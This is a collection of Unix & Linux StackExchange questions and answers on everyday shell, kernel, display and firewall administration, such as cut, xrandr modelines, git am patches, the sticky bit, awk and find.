10:32;1563111121.M682713P685072.de122.abteilung.com,S=1258,W=1287:2,

In some way that it would result in rows as follows:

1563101282.M178569P409830.de122.abteilung.com,S=1258,W=1287:2,
1563102004.M49870P436474.de122.abteilung.com,S=1258,W=1287:2,
1563102961.M195946P457876.de122.abteilung.com,S=1258,W=1287:2,
1563103921.M334168P463856.de122.abteilung.com,S=1258,W=1287:2,
1563104883.M883187P502037.de122.abteilung.com,S=1258,W=1287:2,
1563105603.M799240P519637.de122.abteilung.com,S=1258,W=1287:2,
1563106561.M419884P547969.de122.abteilung.com,S=1258,W=1287:2,
1563107524.M145768P582635.de122.abteilung.com,S=1258,W=1287:2,
1563108483.M632493P607265.de122.abteilung.com,S=1258,W=1287:2,
1563109203.M675460P633790.de122.abteilung.com,S=1258,W=1287:2,
1563110163.M299406P663234.de122.abteilung.com,S=1258,W=1287:2,
1563111121.M682713P685072.de122.abteilung.com,S=1258,W=1287:2,

Would it be possible in GNU awk , egrep or sed ?
This is what the cut command is for. cut -d';' -f2-
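For example, assuming the list is stored in a file called list.txt:

cut -d';' -f2- list.txt > result.txt

Here -d';' sets the field delimiter to a semicolon and -f2- keeps everything from the second field onward, so any further semicolons in a line are left intact.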
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547551", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/377528/" ] }
547,567
When I compile a C (no pluses) program using GCC, there are several levels of messages possible, like warning, error, and note. The note messages are useless and distracting. How do I make them go away using the command line? (I don't use any sort of IDE.) Example: /home/user/src9/AllBack3.c:129:9: note: each undeclared identifier is reported only once for each function it appears in.
Pass the -fcompare-debug-second option to gcc . gcc's internal API has a diagnostic_inhibit_note() function which turns any "note:" messages off, but that is only serviceable via the unexpected -fcompare-debug-second command line switch, defined here . Fortunately, turning notes off is its only effect, unless the -fcompare-debug or the -fdump-final-insns options are also used, which afaik are only for debugging the compiler itself.
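For example, compiling a single translation unit with notes suppressed (the file name is taken from the error message in the question):

gcc -fcompare-debug-second -c AllBack3.c

Warnings and errors are still reported as usual; only the note: diagnostics disappear.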
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547567", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/289448/" ] }
547,650
I am a beginner in Linux. When I install Arch Linux as dual boot and download the base system, I then go into the chroot and try to build the initramfs using the command mkinitcpio -p linux . When I run it, it gives me "command not found". I installed using this video: https://www.youtube.com/watch?v=METZCp_JCec (I am stuck at minute 9:16).
Since 2019-10-06 it's required to install a kernel besides installing the base package. So you have to install either linux or linux-lts (or another kernel of your choice) that will pull the mkinitcpio package as a dependency. The up-to-date instructions mention that you have to do:

pacstrap /mnt base linux linux-firmware

So in your case basically you have to do pacstrap /mnt linux linux-firmware outside of the chroot, and then you will get the mkinitcpio tool available once you enter the chroot. The video you mention is from 2014, so don't take that modification into account. At 6:29 you can see that the package linux is being pulled when he is installing base, but it's not the case anymore (you can check in the /mnt/var/log/pacman.log file that no linux package has been installed).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547650", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378063/" ] }
547,653
The man page for fstab has this to say about the pass value:

Pass (fsck order)

Fsck order is to tell fsck what order to check the file systems, if set to "0" file system is ignored. Often a source of confusion, there are only 3 options:

0 == do not check.
1 == check this partition first.
2 == check this partition(s) next

In practice, use "1" for your root partition, / and 2 for the rest. All partitions marked with a "2" are checked in sequence and you do not need to specify an order. Use "0" to disable checking the file system at boot or for network shares.

It doesn't explicitly mention values higher than 2, but implies that 0 , 1 and 2 are the only useable values. Other sources (such as the fsck man page ) imply that values above 0 will be treated in ascending order ("passno value of greater than zero will be checked in order"). Can values higher than 2 be used, or not?
The answer is.. it depends, but probably not. TL;DR if you use systemd , non-zero pass numbers will be checked in the order in which they appear in fstab , otherwise pass numbers will be checked sequentially in ascending order and values higher than 2 can be used. On most distributions of linux, the fsck binary is provided by util-linux . This fsck accepts pass numbers higher than 2 , and these will be treated in order. Any system which calls fsck directly will understand "pass number" values higher than 2 in fstab . It turns out that util-linux 's fsck is not always used to check fstab . systemd maintains its own internal copy of fsck called systemd-fsck , which treats any non-zero fstab entries in the order in which they appear (specifically, it will not scan your pass number 1 entries before others). On linux distributions that use systemd , systemd-fsck is used for automated file system checks, and in those cases the pass number is treated as a boolean ( 0 is means "false", or "don't verify" and != 0 is true, or "verify"). Also, don't forget that the root drive (the / mount) is sometimes checked separately. Many thanks to Ned64 , who did much research in their answer .
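For reference, a typical fstab layout under the classic (non-systemd) interpretation, with the pass number in the last field (the devices and mount points are illustrative):

# <device>       <mount>   <type>  <options>  <dump>  <pass>
/dev/sda2        /         ext4    defaults   0       1
/dev/sda3        /home     ext4    defaults   0       2
server:/export   /mnt/nfs  nfs     defaults   0       0

Under systemd, the same non-zero values simply mean "check this filesystem", in fstab order.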
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547653", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/72873/" ] }
547,812
I just got a new display (Samsung LC27JG50QQU, 1440p, 144hz) which is plugged into my AMD Radeon HD 6950 (DVI-D, DVI-I, HDMI 1.4, 2x Mini DisplayPort) graphics card using HDMI. However, it only lets me set 1080p max in my display settings. Cable and monitor were fine on 1440p with my MacBook Pro. I am running Linux Mint 19.1 Tessa. This is the output xrandr gives:

Screen 0: minimum 320 x 200, current 1920 x 1080, maximum 16384 x 16384
DisplayPort-3 disconnected (normal left inverted right x axis y axis)
DisplayPort-4 disconnected (normal left inverted right x axis y axis)
HDMI-3 connected primary 1920x1080+0+0 (normal left inverted right x axis y axis) 597mm x 336mm
   1920x1080     60.00*   50.00    59.94
   1680x1050     59.88
   1600x900      60.00
   1280x1024     75.02    60.02
   1440x900      59.90
   1280x800      59.91
   1152x864      75.00
   1280x720      60.00    50.00    59.94
   1024x768      75.03    70.07    60.00
   832x624       74.55
   800x600       72.19    75.00    60.32    56.25
   720x576       50.00
   720x480       60.00    59.94
   640x480       75.00    72.81    66.67    60.00    59.94
   720x400       70.08
DVI-0 disconnected (normal left inverted right x axis y axis)
DVI-1 disconnected (normal left inverted right x axis y axis)
VGA-1-1 disconnected (normal left inverted right x axis y axis)
HDMI-1-1 disconnected (normal left inverted right x axis y axis)
DP-1-1 disconnected (normal left inverted right x axis y axis)
HDMI-1-2 disconnected (normal left inverted right x axis y axis)
HDMI-1-3 disconnected (normal left inverted right x axis y axis)
DP-1-2 disconnected (normal left inverted right x axis y axis)
DP-1-3 disconnected (normal left inverted right x axis y axis)

lspci -k | grep -EA3 'VGA|3D|Display' :

00:02.0 Display controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09)
    Subsystem: Gigabyte Technology Co., Ltd 2nd Generation Core Processor Family Integrated Graphics Controller
    Kernel driver in use: i915
    Kernel modules: i915
--
01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Cayman PRO [Radeon HD 6950]
    Subsystem: Hightech Information System Ltd. Cayman PRO [Radeon HD 6950]
    Kernel driver in use: radeon
    Kernel modules: radeon

glxinfo | grep -i vendor :

server glx vendor string: SGI
client glx vendor string: Mesa Project and SGI
Vendor: X.Org (0x1002)
OpenGL vendor string: X.Org

EDID:

00ffffffffffff004c2d560f4d325530071d0103803c22782a1375a757529b25105054bfef80b300810081c081809500a9c0714f0101565e00a0a0a029503020350055502100001a000000fd00324b1b5919000a202020202020000000fc004332374a4735780a2020202020000000ff0048544f4d3230303034340a2020014d02031bf146901f04130312230907078301000067030c0010008032023a801871
First create the appropriate modeline with cvt :

$ cvt 2560 1440
# 2560x1440 59.96 Hz (CVT 3.69M9) hsync: 89.52 kHz; pclk: 312.25 MHz
Modeline "2560x1440_60.00"  312.25  2560 2752 3024 3488  1440 1443 1448 1493 -hsync +vsync

Then add the mode using xrandr --newmode :

$ xrandr --newmode "2560x1440_60.00" 312.25 2560 2752 3024 3488 1440 1443 1448 1493 -hsync +vsync

Finally set your display to that particular mode:

$ xrandr --addmode HDMI-3 2560x1440_60.00
$ xrandr --output HDMI-3 --mode 2560x1440_60.00

EDIT 1: Going by the OP's EDID his monitor is reported as **C27JG5x** . edid-decode also reports the following:

EDID version: 1.3
Manufacturer: SAM Model f56 Serial Number 810889805
Made in week 7 of 2019
Digital display
Maximum image size: 60 cm x 34 cm
Gamma: 2.20
DPMS levels: Off
RGB color display
First detailed timing is preferred timing
Display x,y Chromaticity:
  Red:   0.6523, 0.3408
  Green: 0.3203, 0.6083
  Blue:  0.1455, 0.0654
  White: 0.3134, 0.3291
Established timings supported:
  720x400@70Hz 9:5 HorFreq: 31469 Hz Clock: 28.320 MHz
  640x480@60Hz 4:3 HorFreq: 31469 Hz Clock: 25.175 MHz
  640x480@67Hz 4:3 HorFreq: 35000 Hz Clock: 30.240 MHz
  640x480@72Hz 4:3 HorFreq: 37900 Hz Clock: 31.500 MHz
  640x480@75Hz 4:3 HorFreq: 37500 Hz Clock: 31.500 MHz
  800x600@56Hz 4:3 HorFreq: 35200 Hz Clock: 36.000 MHz
  800x600@60Hz 4:3 HorFreq: 37900 Hz Clock: 40.000 MHz
  800x600@72Hz 4:3 HorFreq: 48100 Hz Clock: 50.000 MHz
  800x600@75Hz 4:3 HorFreq: 46900 Hz Clock: 49.500 MHz
  832x624@75Hz 4:3 HorFreq: 49726 Hz Clock: 57.284 MHz
  1024x768@60Hz 4:3 HorFreq: 48400 Hz Clock: 65.000 MHz
  1024x768@70Hz 4:3 HorFreq: 56500 Hz Clock: 75.000 MHz
  1024x768@75Hz 4:3 HorFreq: 60000 Hz Clock: 78.750 MHz
  1280x1024@75Hz 5:4 HorFreq: 80000 Hz Clock: 135.000 MHz
  1152x870@75Hz 192:145 HorFreq: 67500 Hz Clock: 108.000 MHz
Standard timings supported:
  1680x1050@60Hz 16:10 HorFreq: 64700 Hz Clock: 119.000 MHz
  1280x800@60Hz 16:10
  1280x720@60Hz 16:9
  1280x1024@60Hz 5:4 HorFreq: 64000 Hz Clock: 108.000 MHz
  1440x900@60Hz 16:10 HorFreq: 55500 Hz Clock: 88.750 MHz
  1600x900@60Hz 16:9
  1152x864@75Hz 4:3 HorFreq: 67500 Hz Clock: 108.000 MHz
Detailed mode: Clock 241.500 MHz, 597 mm x 336 mm
  2560 2608 2640 2720 hborder 0
  1440 1443 1448 1481 vborder 0
  +hsync -vsync
  VertFreq: 59 Hz, HorFreq: 88786 Hz
Monitor ranges (GTF): 50-75Hz V, 27-89kHz H, max dotclock 250MHz
Monitor name: C27JG5x
Serial number: HTOM200044
Has 1 extension blocks
Checksum: 0x4d (valid)

While the problem might just as likely lie in the radeon driver (namely the "drmmode_do_crtc_dpms cannot get last vblank counter" message reported in Xorg.log; a fix I am in the process of putting together in EDIT 2), in the OP's case the monitor might be able to produce an output with the following modeline as reported by edid-decode :

Modeline "2560x1440" 241.500 2560 2608 2640 2720 1440 1443 1448 1481 +hsync -vsync

and then again using xrandr as follows:

$ xrandr --newmode "2560x1440" 241.500 2560 2608 2640 2720 1440 1443 1448 1481 +hsync -vsync
$ xrandr --addmode HDMI-3 "2560x1440"
$ xrandr --output HDMI-3 --mode 2560x1440

This might very well work, as both cvt and gtf fail to produce a modeline limited by the EDID-reported max dotclock of 250MHz. My own monitor (only capable of 1080p) actually tries to produce the impossible 2560x1440 resolution when given a modeline properly limited by the EDID max dotclock, unlike when given the cvt modeline, which completely shuts down the monitor into standby mode with a message on the screen that says "input not available".

In the OP's case it was necessary to further drop the refresh rate by limiting the dotclock, so the following two modelines may need to be used instead of the one above:

xrandr --newmode "2560x1440_54.97"  221.00  2560 2608 2640 2720  1440 1443 1447 1478 +HSync -VSync
xrandr --newmode "2560x1440_49.95"  200.25  2560 2608 2640 2720  1440 1443 1447 1474 +HSync -VSync

One additional important point is to make sure that the GPU clock as specified by the driver is also capable of the chosen bandwidth, by checking the value reported by grep -iH PixClock /var/log/Xorg.* , and even more importantly that the cable standard you are using conforms to the bandwidth limits of the HDMI or DisplayPort revision in use.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547812", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/291961/" ] }
547,882
The command echo Hello World prints Hello World as expected, but echo Hello (World) generates the error syntax error near unexpected token `(' . I'm aware that brackets such as () , {} , [] are tokens and have a special meaning, so how do you "escape" these in a bash script?
They're not actually tokens in the lexer sense, except for the plain parentheses ( and ) . { and } in particular don't need any quoting at all:

$ echo {Hello World}
{Hello World}

(except if you have { or } as the first word of a command, where they're interpreted as keywords; or if you have {a,b} in a single word with a comma or double-dot in between, where it's a brace expansion.) [] is also only special as a glob character, and if there are no matching filenames, the default behaviour is to just leave the word as-is. But anyway, to escape them, you'd usually quote them with single or double-quotes:

echo "(foo bar)"
echo '(foo bar)'

Or just escape the relevant characters one-by-one, though that's a bit weary:

echo \(foo\ bar\)

Or whatever combination you like:

echo \(fo"o bar"')'

See:
What is the difference between "...", '...', $'...', and $"..." quotes?
When is double-quoting necessary?
Why does my shell script choke on whitespace or other special characters?
https://mywiki.wooledge.org/Quotes
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547882", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/319428/" ] }
547,896
I would like to compile a kernel for fedora which contains some not yet merged patches which fix a hardware device of mine. The patches are located here . I have read the guide on compiling a kernel for Fedora . What I am unsure of is how I get the patches from the mailing list and then apply them to my copy of the Linux source code. Obviously I could copy and paste the changes by hand in to the code but I assume there is a much better way than that. From what I understand you can create a git patch file which you can then apply. What would be the best way to apply this code contained in the emails?
This patch series was sent to linux-input , so it's available on Patchwork . To find it, you'll need to remove the "Action Required" filter at the top of the screen; you'll then find v2 of the patch (which matches your link), and also v3 of the patch which is the version that was merged. There's a handy "Series" link in the top-right-hand corner: click on that, save the resulting file, then in your kernel tree, git am /path/to/Logitech-G920-fixes.patch will apply it for you. On the current kernel tree, you will need to apply this patch first; so download that, and apply

git am /path/to/HID-Fix-assumption-that-devices-have-inputs.patch
git am /path/to/Logitech-G920-fixes.patch

To figure that out, I added the HID tree as a remote, then looked at the log for drivers/hid/hid-logitech-hidpp.c :

git remote add hid https://git.kernel.org/pub/scm/linux/kernel/git/hid/hid.git
git fetch hid
git log HEAD..hid/for-next drivers/hid/hid-logitech-hidpp.c

If you're going to work with Patchwork again in the future, it's worth downloading pwclient and configuring ~/.pwclientrc :

[options]
default = linux-input

[linux-input]
url = https://patchwork.kernel.org/xmlrpc/

Then you can run pwclient git-am 11173117 and pwclient git-am 11197515 to apply the patch series directly.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547896", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/102238/" ] }
547,898
I have a number of VPSes running Ubuntu 18.04 LTS with iptables as the firewall. At the moment I am running SSH on port 22, on which there are many, many login attempts from foreign IP addresses. I want to limit these hits by redirecting an arbitrary port number (for example 2222) to port 22 via iptables. For reasons I do not want to adjust the SSH config to listen on port 2222. As a "bonus" I want to be able to keep port 22 open for ONLY IP x.x.x.x (for now 1.1.1.1). I have tried the following. Exclude all but my own IP:

iptables -A INPUT -s 1.1.1.1/32 -i venet0 -p tcp -m tcp --dport 22 -j ACCEPT

This works well. Now to redirect 2222 to 22:

iptables -t nat -A PREROUTING -i venet0 -p tcp --dport 2222 -j REDIRECT --to-port 22

This doesn't seem to work. The redirection only works if I open port 22, but then the port is open to all visitors. Could someone shed some light on this? Thanks!
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/547898", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378260/" ] }
547,904
I would like to extract the contents of a field in a file. The data looks like this:

{"_index":"bk","_type":"account","_id":"1","_score":1,"_source":{"a_n":1,"firstname":"Blake","lastname":"Hess","age":30,"gender":"M","address":"anything Avenue","employer":"anything","email":"[email protected]","city":"anything","state":"anything"}}

The desired output:

Blake
Use jq to parse json data: jq -r '._source.firstname' With the input data from the question it shows the desired output.
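For example, with the record from the question saved in a file (the name doc.json is just for illustration):

jq -r '._source.firstname' doc.json

The -r flag outputs the raw string Blake instead of the JSON-quoted "Blake".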
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/547904", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/284556/" ] }
547,968
-b, --before

The separator is attached to the beginning of the record that it precedes in the file.

And I can't understand the following output:

$ echo -e "Hello\nNew\nWorld\n!" > file
$ tac file
!
World
New
Hello
$ tac -b file
!
World
NewHello

Why is there no newline between New and Hello ?
tac works with records and their separators, attached , by default after the corresponding record. This is somewhat counter-intuitive compared to other record-based tools (such as AWK) where separators are detached. With -b , the records, with their newline attached, are as follows (in original order):

Hello
\nNew
\nWorld
\n!
\n

Output in reverse, this becomes

\n\n!\nWorld\nNewHello

which corresponds to the output you see. Without -b , the records, with their newline attached, are as follows:

Hello\n
New\n
World\n
!\n

Output in reverse, this becomes

!\nWorld\nNew\nHello\n
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/547968", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/223016/" ] }
548,002
How can I set permissions, preferably with a single chmod command, that allow any user to create a file in a directory, while only the owner of a file (the user who created it) can delete their own file, but no one else's, in that directory? I was thinking of using:

chmod 755 directory

as the user can create a file and delete it, but won't that allow the user to delete other people's files? I only want the person who created the file to be able to delete their own file. So, anyone can make a file but only the person who created a file can delete that file (in the directory).
The sticky bit can do more or less what you want. From man 1 chmod :

The restricted deletion flag or sticky bit is a single bit, whose interpretation depends on the file type. For directories, it prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories like /tmp.

That is, the sticky bit's presence on a directory only allows contained files to be renamed or deleted if the user is either the file's owner or the containing directory's owner (or the user is root). You can apply the sticky bit (which is represented by octal 1000, or t ) like so:

# instead of your chmod 755
chmod 1777 directory

# or, to add the bit to an existing directory
chmod o+t directory
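You can verify that the bit took effect by listing the directory; a t in place of the final x marks the sticky bit (the owner, size and date below are placeholder values):

$ ls -ld directory
drwxrwxrwt 2 root root 4096 Oct 25 12:00 directory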
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/548002", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/322247/" ] }
548,278
I would like to view a text file with awk/grep which contains a Unix timestamp in the first column. How can I convert it to a human-readable time while viewing?
If the line starts with the unix timestamp, then this should do it:

perl -pe 's/^(\d+)/localtime $1/e' inputfilename

perl -p invokes a loop over the expression passed with -e , which is executed for each line of the input, and prints the buffer at the end of the loop. The expression uses the substitution command s/// to match and capture a sequence of digits at the beginning of each line, and replace it with the local time representation of those digits interpreted as a unix timestamp. /e indicates that the replacement pattern is to be evaluated as an expression.
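As a quick illustration (the log line is made up, and localtime renders in your local timezone; the output below assumes UTC):

$ echo '1571234567 something happened' | perl -pe 's/^(\d+)/localtime $1/e'
Wed Oct 16 14:02:47 2019 something happened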
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/548278", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/287311/" ] }
548,315
I need to replace all single quotes ( ' ) contained in /tmp/myfile with double quotes ( " ). I'm using this:

sed -i 's/'/\"/g' /tmp/myfile

and other combinations, but I cannot find a way which works. Any help please.
To replace single quotes ( ' ) it's easiest to put the sed command within double quotes and escape the double quote in the replacement:

$ cat quotes.txt
I'm Alice
$ sed -e "s/'/\"/g" quotes.txt
I"m Alice

Note that the single quote is not special within double quotes, so it must not be escaped. If, instead, one wants to replace backticks ( ` ), as the question originally mentioned, they can be used as-is within single quotes:

$ cat ticks.txt
`this is in backticks`
$ sed -e 's/`/"/g' ticks.txt
"this is in backticks"

Within double quotes, you'd need to escape the backtick with a backslash, since otherwise it starts an old-form command substitution. See also:
What is the difference between "...", '...', $'...', and $"..." quotes?
How to use a special character as a normal one?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548315", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/72071/" ] }
548,540
I am trying to write code that would turn any given word into its numeronym. For example: internationalization = i18n (first char + number of chars in between + last char). I found how to find the first and the last character and I know how to find the number part, but I don't know how to put the number between the first and the last character. The code I used to get the number part is:

cut -c 2- | rev | cut -c 2- | rev | tr -d [:space:] | wc -c

The code I used to get the first and the last characters:

awk -F "" '{print $1,$NF}'
Although I find the use of awk with an empty field separator somewhat 'innovative', the simplest solution in my opinion is just a small expansion of yours:

awk -F "" '{print $1 (NF-2) $NF}'

This works only with words of three or more letters, of course. To handle the general case:

awk -F "" '{if (NF>2) print $1 (NF-2) $NF; else print $0}'

As an explanation:

By setting the field separator to "empty" with -F "" , the input is split into fields after every character, i.e. every character of the input is considered an individual "field" that is accessible via $n in awk expressions (with n being the field number ranging from 1 to NF ). Btw, the GNU Awk User's Guide explicitly provides such use cases as examples, so I stand corrected on my previous concerns about using an empty FS. Still, note that the manual says "This is a common extension; it is not specified by the POSIX standard".

If the number of fields (i.e. characters, here) is larger than two, print the first field/character ( $1 ), the evaluated expression ( NF-2 ) which amounts to the number of characters in between the first and the last, and the last field/character ( $NF ). Note that the print call as used here does not produce space between the individual output tokens; this only happens when separating the arguments with commas instead of space (see e.g. the GNU Awk User's Guide ).

Otherwise ( else ), simply print the entire input expression, which is accessible via $0 .

Note that if we would feed a two-character input, e.g. at , to the first code example, we would get unwanted (but formally correct) output like a0t (because there are, in this case, zero characters between first and last). Note also , and this is important, that if you supply a string containing leading or trailing whitespace to this awk call, like in echo " hello" | awk <etc.> , then that leading/trailing whitespace would be treated as the first/last character, thus giving unwanted behaviour!
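A couple of sample runs of the guarded version:

$ echo internationalization | awk -F "" '{if (NF>2) print $1 (NF-2) $NF; else print $0}'
i18n
$ echo at | awk -F "" '{if (NF>2) print $1 (NF-2) $NF; else print $0}'
at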
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548540", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378813/" ] }
548,596
For example in Swift you would do:

let date = Date(timeIntervalSinceReferenceDate: 500000)
print(date)

to get:

2001-01-06 18:53:20 +0000
Since the Unix Epoch is 1970-01-01 00:00:00 UTC rather than 2001-01-01 00:00:00 UTC, available tools, like the GNU date command, must just be supplied the seconds between both in addition to the actual data, to give the result using their built-in conversion features.

$ seconds=500000
$ TZ=UTC date --iso-8601=s -d @$(( $(date +%s -d '2001-01-01T00:00:00+00') + $seconds ))
2001-01-06T18:53:20+00:00

UPDATE : (thanks to @Kusalananda's comment) actually there's not even the need to mention the Unix Epoch, because the GNU date command accepts directly adding a time offset to a given date. It must just be supplied with the correct unit suffix (here seconds ). This makes the command simpler, more generic, and easier to read:

$ seconds=500000
$ TZ=UTC date --iso-8601=s -d "2001-01-01T00:00:00+00 + $seconds seconds"
2001-01-06T18:53:20+00:00

To output exactly like the OP's output format, replace --iso-8601=s with '+%F %T %z' . The above command uses these options and parameters:

-d : use the given date rather than the current date. Can include additions of time offsets.
--iso-8601=s is the ISO format similar to (give or take some spaces etc.) +%F %T %z , which is the same as +%Y-%m-%d %H:%M:%S %z : self-explanatory, with %z the timezone offset to UTC, which here will be +0000 since TZ=UTC forced it.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548596", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/79979/" ] }
548,669
I have a Debian 10 system which uses an encrypted LVM2 . Currently I have a 10G /var partition that is not big enough for my daily usage of docker , so I decided to resize it. To my surprise, I have no tool to manage LVM installed, nor available in my repositories! Plus the documentation in the Debian wiki is outdated.

root@almanzora:~# pvchange
bash: pvchange: command not found
root@almanzora:~# pvck
bash: pvck: command not found
root@almanzora:~# pvcreate
bash: pvcreate: command not found
root@almanzora:~# pvdisplay
bash: pvdisplay: command not found
root@almanzora:~# pvmove
bash: pvmove: command not found
root@almanzora:~# pvs
bash: pvs: command not found
root@almanzora:~# pvscan
bash: pvscan: command not found
root@almanzora:~#

How can I handle my LVM now without the tools, and without "breaking Debian" by installing old packages from previous versions?
Note that in older versions of Debian the su command came from the old shadow source package, but Debian 10's su comes from the util-linux source code and has different semantics. Depending on how exactly you're switching to root, you might now be getting /sbin and /usr/sbin omitted from your PATH , which would explain the shell not finding the LVM tools. Debian 10.x does not include any */sbin paths by default. Solve this issue with:

export PATH=/usr/local/sbin:/usr/sbin:/sbin:$PATH

In this particular case, switching to root with su - (instead of su ) adds the appropriate directories to the PATH .
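A quick way to see the difference between the two invocations (the exact output will vary with your configuration):

$ su -c 'echo $PATH'     # plain su: the sbin directories may be missing
$ su - -c 'echo $PATH'   # login shell: root's full PATH, including /sbin and /usr/sbin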
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548669", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/213217/" ] }
548,700
There is a thread that talks about ls "*" not showing any files, but I actually wonder why the simple ls * command doesn't output anything in my terminal other than

ls: invalid option -- '|'
Try 'ls --help' for more information.

while ls will list all the files in the current directory as

1                 ferol                      readme.txt
2                 fichier                    sarku
2018              GameShell                  Templates
22223333         '-|h4k3r|-'                 test
3                 hs_err_pid2301.log         test2
CA.txt            important.top.secret.txt   toto.text
CA.zip            JavaBlueJProject           tp1_inf1070
countryInfo.txt   liendur                   'tp1_inf1070_A19(2) (1)'
currency          liensymbolique             tp1_inf1070_A19.tar
curreny           LOL                        Videos
Desktop           Longueuil                 'VirtualBox VMs'
Documents         Music                      words
douffos           numbers                    Zip.zip
Downloads         Pictures                   examples.desktop
Public

Any ideas as to why the globbing doesn't take effect here? I'm on Ubuntu, working in the terminal; I don't know if it makes a difference. Thanks.
When you run ls * globbing takes effect as usual, and the * expands to all filenames in the current directory -- including this one: -|h4k3r|- That starts with a - , so ls tries to parse it as an option (like -a or -l ). As | isn't actually an option recognized by ls , it complains with the error message invalid option , then exits (without listing any files). If you want to list everything in the current folder explicitly, instead try ls ./* ...which will prefix all filenames with ./ (so that entry will not be misinterpreted as an option), or ls -- * ...where -- is the "delimiter indicating end of options", ie. any remaining arguments are filenames.
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/548700", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378955/" ] }
548,704
I'm trying different .xstartup files to have KDE up when using tightvncserver, but I keep on seeing the empty screen. Any help? The current .xstartup is:

#!/bin/sh
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
vncconfig -iconic &
dbus-launch --exit-with-session gnome-session &
startkde &
{ "score": 7, "source": [ "https://unix.stackexchange.com/questions/548704", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378957/" ] }
548,737
I don't get this:

script: WORKDIR/sh/script.sh

[ -e filename ] \
&& echo filename \
|| [ -e ../filename ] \
&& echo ../filename \
|| { echo 'ERROR: failed to find "filename"' 1>&2 ; exit -1; }

output:

$ cd WORKDIR/sh
$ ./script.sh
../filename
$ cd WORKDIR
$ sh/script.sh
filename
../filename    # <---- WHY????

My thoughts:

Case 1:

[ -e filename ] \          -> false
&&                         -> skip this, it is already false
echo filename \            -> don't even try
|| [ -e ../filename ] \    -> true
&& echo ../filename \      -> true
||                         -> already true, skip the rest
{ echo 'ERROR: failed to find "filename"' 1>&2 ; exit -1; }

Case 2:

[ -e filename ] \          -> true
&& echo filename \         -> true
||                         -> already true, skip the rest
[ -e ../filename ] \
&& echo ../filename \
|| { echo 'ERROR: failed to find "filename"' 1>&2 ; exit -1; }

version:

$ bash --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
&& and || have equal precedence, so the list is evaluated strictly left to right: when a command succeeds, the shell will look for the next && and execute it, even if it is not the directly adjacent operator. You should never use more than one of these operators in a single command list. If more than one is needed, use an if/then construct.

$ true && true || echo yes && echo no
no

This is very much different than:

if true; then
    true
else
    echo yes && echo no
fi

$ if true; then true; else echo yes && echo no; fi
$

Or:

$ true && false || echo yes && echo no
yes
no
$ if true; then false; else echo yes && echo no; fi
$

I would write your construct as:

if [ -e filename ]; then
    echo filename
elif [ -e ../filename ]; then
    echo ../filename
else
    echo 'ERROR: failed to find "filename"' >&2
    exit -1
fi
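If you do want to keep it as a single command list rather than an if, grouping each test with its echo restores the intended short-circuiting; this is a sketch rather than part of the original answer, and it still assumes the echo calls themselves succeed:

{ [ -e filename ] && echo filename; } \
|| { [ -e ../filename ] && echo ../filename; } \
|| { echo 'ERROR: failed to find "filename"' 1>&2; exit 1; }

A brace group only succeeds when both its test and its echo succeed, so the result of one branch can no longer leak into the following && branch.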
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/548737", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/233854/" ] }
548,753
By using ls -lh we can get the file size. Is there any way I can check if the file size is greater than 1MB and then print a message like below? I may have files with different sizes like 100MB, 1GB, 10GB, 100KB.

if [ $FileSize > 1MB ]; then
    echo "File size is greater than 1MB"
fi

Is there a way I can check the file size using an if statement?
Using find on a specific file at $filepath :

if [ -n "$(find "$filepath" -prune -size +1000000c)" ]; then
    printf '%s is strictly larger than 1 MB\n' "$filepath"
fi

This uses find to query the specific file at $filepath for its size. If the size is greater than 1000000 bytes, find will print the pathname of the file; otherwise it will generate nothing. The -n test is true if the string has non-zero length, which in this case means that find output something, which in turn means that the file is larger than 1 MB.

You didn't ask about this: finding all regular files that are larger than 1 MB under some $dirpath and printing a short message for each:

find "$dirpath" -type f -size +1000000c \
    -exec printf '%s is larger than 1 MB\n' {} +

These pieces of code ought to be portable to any Unix.

Note also that using < or > in a test will test whether the two involved strings sort in a particular way lexicographically. These operators do not do numeric comparisons. For that, use -lt ("less than"), -le ("less than or equal to"), -gt ("greater than"), -ge ("greater than or equal to"), -eq ("equal to"), or -ne ("not equal to"). These operators do integer comparisons.
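As an alternative sketch, not from the answer above and less portable: on systems with GNU stat you can fetch the byte count and compare it with the integer operators described above:

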